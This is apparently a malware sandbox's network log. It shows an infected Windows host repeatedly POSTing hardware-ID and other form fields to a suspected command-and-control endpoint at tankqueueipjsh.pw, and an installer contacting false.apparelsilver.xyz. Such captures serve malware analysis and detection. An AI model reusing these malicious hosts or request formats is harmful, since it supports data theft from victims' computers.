                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.938107967 CET116INData Raw: 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 38 35 38 64 66 35 30 37 36 36 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: eCF-RAY: 8314e9858df50766-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:27.938122034 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        53192.168.2.550239104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:31.575551033 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:31.575740099 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:31.939810038 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:31 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=lj1j4aiucjko5k1k04kr7c7k29; expires=Sun, 31 Mar 2024 07:22:10 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:31 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:31 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:31 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KiW5AcvATvQ98zfBGkA3lj1IYqKZ6l9xcEJKcG%2FcZ9XEwuUdWvkNnSIE0DNEkMiIl28OnpiU2rKUTerIeEYBiSvgwSbNGxopZRJBmunpEehLEJ6kWKPNGXbdpwDwg%2FNUNmPk5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudf
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:31.939944029 CET118INData Raw: 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 39 65 39 66 33 33 30 35 39 37 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: areCF-RAY: 8314e99e9f330597-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:31.939955950 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        54192.168.2.550240104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:36.356295109 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:36.356453896 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:36.622420073 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:36 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=7h2bf80j89f52bakvccsk2igg2; expires=Sun, 31 Mar 2024 07:22:15 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:36 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:36 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:36 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U0uzJHCG3Ib%2B4rxZRItFY5OyaCwrdvYawWjerUWCmydn%2BbZg8ezZHJgkT2Vn07r0fkLbujksKk3h43XB9RGmLs5cpKDCSH6How0U7f3NR6zrl2B4G2slOIQ41wnUqtjwG%2Bxo%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cl
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:36.622442961 CET122INData Raw: 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 62 63 37 62 38 31 32 30 39 39 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: udflareCF-RAY: 8314e9bc7b812099-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:36.622478008 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        55192.168.2.550241104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.389102936 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.389303923 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.739571095 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:37 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=ddk1kmmpa11t9nqsb3ec32tpth; expires=Sun, 31 Mar 2024 07:22:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:37 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:37 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:37 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tu7j6NvAprvDSPinBEu5BAGzbtcKILILMGsI2n6DfchFDTcrmbWW3WuW%2FenR829zv2Ji%2F46OFHpxLP6DQrouXszCr4rzxJLlB4lAarfcLLjAJx3rNL0WPkDGKUUlBpwA%2BX2Axw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: clou
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.739583969 CET120INData Raw: 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 63 32 65 39 63 38 33 39 38 62 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: flareCF-RAY: 8314e9c2e9c8398b-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.739594936 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        56192.168.2.550242104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.841597080 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:37.841785908 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.197607040 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:38 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=mquoj1rnp6p60pppf1uoigmanq; expires=Sun, 31 Mar 2024 07:22:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:38 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:38 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:38 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YJ7ZV57fFRtzmJegTf6MA0tjEmmis7LvLqgchqekpfdTtCU2loZxE%2FO7Axm6VvBKhNpH9tEbXO7Q6EF3tEYEF3Qnz9fVMB4UFsXC8dIoOeuHJqYTGEv%2F3OTqI61Bnyx1aE1W6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudf
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.197643995 CET118INData Raw: 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 63 35 63 38 30 63 33 39 32 35 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: areCF-RAY: 8314e9c5c80c3925-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.197694063 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        57192.168.2.550243104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.301213980 CET335OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 500
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.301549911 CET554OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.655330896 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:38 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=frhg6nglppekimpg0lou6g9gn5; expires=Sun, 31 Mar 2024 07:22:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:38 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:38 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:38 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n0RCBrWz1Gzv7%2FJAS1%2F%2FbIwL0X4pueQrvHK%2BPZvzF3n66KMxOngDYIvfs1y4HqPfPI0BfmtmYiYDuMAAc6Jw0rk9vRCvJV51r%2FGMJZZao4afj%2FBIG837pvlU1C6Ir7RDfT4d1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.655344009 CET126INData Raw: 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 63 38 39 39 31 34 32 30 63 34 2d 49 41 44 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: cloudflareCF-RAY: 8314e9c8991420c4-IAD15Malformed packet data
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.655355930 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                        58192.168.2.550244104.21.83.14580
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.763139009 CET336OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Content-Length: 1327
                                                                                                                                                                                                                                                                        Host: tankqueueipjsh.pw
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:38.763765097 CET1381OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 66 38 64 61 37 33 32 64 30 30 30
                                                                                                                                                                                                                                                                        Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l2f8da732d0000f9170d343b08f146u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"Me
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:39.117477894 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:35:39 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=vrhem73k9u16169c7bc2ej0c0a; expires=Sun, 31 Mar 2024 07:22:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sun, 04 Feb 2024 13:35:38 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_use_round=1; expires=Sun, 04 Feb 2024 13:35:38 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_round_n=2; expires=Sun, 04 Feb 2024 13:35:38 GMT; Max-Age=5184000; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=V9%2BKhgPSJIAQDTWwchnNqglr%2FvO347HtNynQuwsyRxFxDHgyhFlRoz9KXVXICnp%2FNEiUjBQy5XlHlkoP9Uj%2BN8O1UB1%2BTv5NQ7vjHXNlFJXWeYxvZsOy1IDetZHH2HznDx7%2Frg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:39.117494106 CET121INData Raw: 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 33 31 34 65 39 63 62 38 65 32 36 38 32 33 63 2d 49 41 44 0d 0a 0d 0a 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 38 33 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: cloudflareCF-RAY: 8314e9cb8e26823c-IAD10ok 102.165.48.83
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:39.117505074 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        0192.168.2.549707172.67.198.1514431992C:\Users\user\AppData\Local\Temp\is-UKDSG.tmp\setup.tmp
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-12-06 13:33:07 UTC180OUTHEAD /ss.php?a=3890&cc=US&t=1701869569 HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        User-Agent: InnoDownloadPlugin/1.5
                                                                                                                                                                                                                                                                        Host: false.apparelsilver.xyz
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
